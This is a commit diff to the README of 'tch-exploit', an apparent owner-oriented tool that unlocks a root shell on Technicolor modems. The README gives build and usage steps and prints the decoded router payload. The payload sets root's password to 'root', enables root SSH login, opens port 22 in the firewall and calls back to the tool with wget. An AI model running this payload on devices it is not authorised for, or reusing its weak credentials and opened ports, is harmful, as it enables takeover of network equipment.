Update README.md for 2026Q1

.gitignore

@@ -1,3 +1,6 @@
+dist/
+node_modules/
+release/
 tch-exploit-linux.zip
 tch-exploit-macos.zip
 tch-exploit-win.zip

README.md

@@ -1,27 +1,80 @@
-Technicolor OpenWRT Shell Unlocker By BoLaMN
+# Technicolor OpenWRT Shell Unlocker By BoLaMN
+
+## Prerequisites
 
 * Connect network cable from your computer to the WAN (red) port of the modem
 * Change your computers network card to be a static ip address
 
-  IPv4 Address: 58.162.0.1
-  Subnet Mask: 255.255.255.0
-  Default Gateway\\Router: 58.162.0.1
+    IPv4 Address: 58.162.0.1
+    Subnet Mask: 255.255.255.0
+    Default Gateway: 58.162.0.1
 
 Run as admin or sudo as it needs permission to bind on ports lower then 1024
 
 avaliable *optional* arguments --acspass, --acsurl, --dhcponly, --ip, --port, -—tftp, --file, -—file-type
 
-## if you are a n00b, go here
-<https://github.com/BoLaMN/tch-exploit/releases>
+## Pre-built binaries
+
+You can find compiled and built binaries in our [releases](https://github.com/BoLaMN/tch-exploit/releases) page
+
+## Building manually
+
+    git clone https://github.com/BoLaMN/tch-exploit.git && cd tch-exploit
+    npm install pkg coffee-script
+    npm install
+    coffee --no-header --bare --compile --output dist src
+    # To build for windows or macos update --targets accordingly
+    npx pkg --targets latest-linuxstatic-x64 --out-path release/ .
+    release/tch-exploit # Run
+
+## Payload
+
+The payload itself is in `src/http/file.coffee` and is encoded. Here you can see the HEX buffer decoded so you would know what is being ran on the router:
+
+    python3 -c "print(bytes.fromhex('<file.coffee buffer contents>').decode())"
+
+---
 
-## building (if you’re extending functionality) 
+    reboot off
+    set button.wps.handler="
+      # 1. Enable root shell in /etc/passwd
+      sed -i 's#/root:.*$#/root:/bin/ash#' /etc/passwd &&
+
+      # 2. Set root password to 'root'
+      echo root:root | chpasswd &&
+
+      # 3. Enable console access in inittab
+      sed -i -e 's/#//' -e 's#askconsole:.*\$#askconsole:/bin/ash#' /etc/inittab &&
+
+      # 4. Configure dropbear (SSH server)
+      (uci -q delete dropbear.afg || true) &&
+      uci add dropbear dropbear &&
+      uci rename dropbear.@dropbear[-1]=afg &&
+      uci set dropbear.afg.enable='1' &&
+      uci set dropbear.afg.Interface='lan' &&
+      uci set dropbear.afg.Port='22' &&
+      uci set dropbear.afg.IdleTimeout='600' &&
+      uci set dropbear.afg.PasswordAuth='on' &&
+      uci set dropbear.afg.RootPasswordAuth='on' &&
+      uci set dropbear.afg.RootLogin='1' &&
+      (uci set dropbear.lan.enable='0' || true) &&
+      uci commit dropbear &&
+      /etc/init.d/dropbear enable &&
+      /etc/init.d/dropbear restart &&
+
+      # 5. Open port 22 in firewall (find and change DROP rule to ACCEPT)
+      (uci -q set $(uci show firewall | grep ... ).target='ACCEPT' || true) &&
+      uci commit firewall &&
+      /etc/init.d/firewall reload &&
+
+      # 6. Restore WPS button to normal function
+      uci set button.wps.handler='wps_button_pressed.sh' &&
+      uci commit &&
+
+      # 7. Signal completion back to tch-exploit
+      wget {{url}}done || true
+    "
 
-```
-npm install pkg coffee-script -g
-npm install
-npm run compile 
-npm run package
-```
 ## Full example with Windows and Technicolor DJA0231 
 
 Connect your PC's Ethernet port to the modem's WAN port and configure your PC's static IP address accordingly:
@@ -54,5 +107,4 @@ Now you press and hold the WPS button for around 3 sec before releasing. On the
 
 Now you can unplug the Ethernet cable from the WAN port and insert it into one of the LAN ports. Change your PC back to DHCP and then putty to 192.168.0.1 and login as root/root
 
-
 License: MIT